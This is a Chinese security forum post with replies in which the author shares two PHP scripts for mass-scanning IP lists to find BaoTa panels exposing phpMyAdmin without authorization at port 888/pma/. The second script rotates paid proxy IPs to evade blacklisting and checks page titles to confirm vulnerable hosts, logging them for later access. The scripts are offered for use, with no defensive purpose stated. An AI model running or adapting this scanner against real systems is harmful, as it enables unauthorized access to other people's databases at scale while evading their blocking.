用户
搜索
  • TA的每日心情
    开心
    4 天前
  • 签到天数: 4 天

    连续签到: 1 天

    [LV.2]偶尔看看

    i春秋-脚本小子

    Rank: 2

    3

    主题

    22

    帖子

    154

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2018-2-4
    发表于 2020-8-31 18:45:03 45302
    近日比较火的宝塔数据库越权
    玩的不亦乐乎

    所以我也来论坛找找 但是看了一下 只有一个大佬发了文章
    看来还是得自己写一个阿
    [PHP] 纯文本查看 复制代码
    <?php
    $str = file_get_contents('./1.txt');//将整个文件内容读入到一个字符串中
    $str_encoding = mb_convert_encoding($str, 'UTF-8', 'UTF-8,GBK,GB2312,BIG5');//转换字符集(编码)
    $arr = explode("\r\n", $str_encoding);//转换成数组
    foreach ($arr as &$row) {
        $row = trim($row);
    }
    unset($row);
     function httpcode($url){
      $ch = curl_init();
      $timeout = 10;
      curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
      curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
      curl_setopt($ch, CURLOPT_HEADER, 1);
      curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
      curl_setopt($ch,CURLOPT_URL,$url);
      curl_exec($ch);
      return $httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
      curl_close($ch);
    }
    for ($i=0; $i < count($arr); $i++) {
      $reg = httpcode("http://".$arr[$i].':888/pma/');
        if ($reg == "200"){
            $myfile = fopen("200.txt", "a+");
            $txt = "http://".$arr[$i].":888/pma/\r\n";
            fwrite($myfile, $txt);
            fclose($myfile);
            echo $arr[$i]."|200\r\n";
      }else{
        echo $arr[$i]."|".$reg."\n\r";
      }
    }
    ?>
    

    但是扫还没5分钟就发现返回状态全是0

    那岂不是白费心思了
    不行 得找找原因 发现全是被拉黑掉了
    我淦 这谁顶得住啊

    继而又写了一个php加代理访问
    但是发现市面上的免费提取ip 真的卡的一批 而且多人用
    所以我就开了一个会员版
    我们来看看
    [PHP] 纯文本查看 复制代码
    <?php
    $str = file_get_contents('./1.txt');//将整个文件内容读入到一个字符串中
    $str_encoding = mb_convert_encoding($str, 'UTF-8', 'UTF-8,GBK,GB2312,BIG5');//转换字符集(编码)
    $arr = explode("\r\n", $str_encoding);//转换成数组
    foreach ($arr as &$row) {
        $row = trim($row);
    }
    unset($row);
      function daili(){
        $arr1 = file_get_contents("http://dynamic.goubanjia.com/dynamic/get/022732ad594b63211bedf451d60f533d.html?sep=3");
           return $arr1;
      }
     function httpcode($url,$ip,$dk){
      $ch = curl_init();
      $timeout = 10;
      curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
      curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
      curl_setopt($ch, CURLOPT_PROXY, $ip); //代理服务器地址
      curl_setopt($ch, CURLOPT_PROXYPORT,$dk); //代理服务器端口
      curl_setopt($ch, CURLOPT_HEADER, 1);
      curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
      curl_setopt($ch,CURLOPT_URL,$url);
      curl_exec($ch);
      return $httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
      curl_close($ch);
    }
    for ($i=0; $i < count($arr); $i++) {
      $por = daili();
      $pordk = explode(":",$por);
      $reg = httpcode("http://".$arr[$i].':888/pma/',$pordk[0],$pordk[1]);
        if ($reg == "200"){
            $title = file_get_contents("http://".$arr[$i].':888/pma/');
            $res = '/<title>.*?((localhost)|(127.0.0.1)).*?<\/title>/';
            preg_match($res,$title,$arrone);
          if ($arrone) {
            $myfile = fopen("200.txt", "a+");
            $txt = "http://".$arr[$i].":888/pma/\r\n";
            fwrite($myfile, $txt);
            fclose($myfile);
            echo $arr[$i]."|200\r\n";
        }
      }else{
        echo $arr[$i]."|".$reg."\n\r";
      }
    }
    ?>
    

    二次改了一下正则获取状态200的title 判断是否真的存在
    用法就不需要多说了
    把扫描好的888端口ip放同目录下1.txt执行php即可

    本帖被以下淘专辑推荐:

    • · sc|主题: 56, 订阅: 3
    这个类型的文章,好像论坛内不多
    使用道具 举报 回复
    支持一下好兄弟
    使用道具 举报 回复
    发表于 2020-9-1 15:53:18
    A1key1ng 发表于 2020-9-1 15:39
    支持一下好兄弟

    谢谢好兄弟
    使用道具 举报 回复
    发表于 2020-9-1 19:43:36
    大佬我来划水了
    末心网络安全团队 | Q群374327762
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册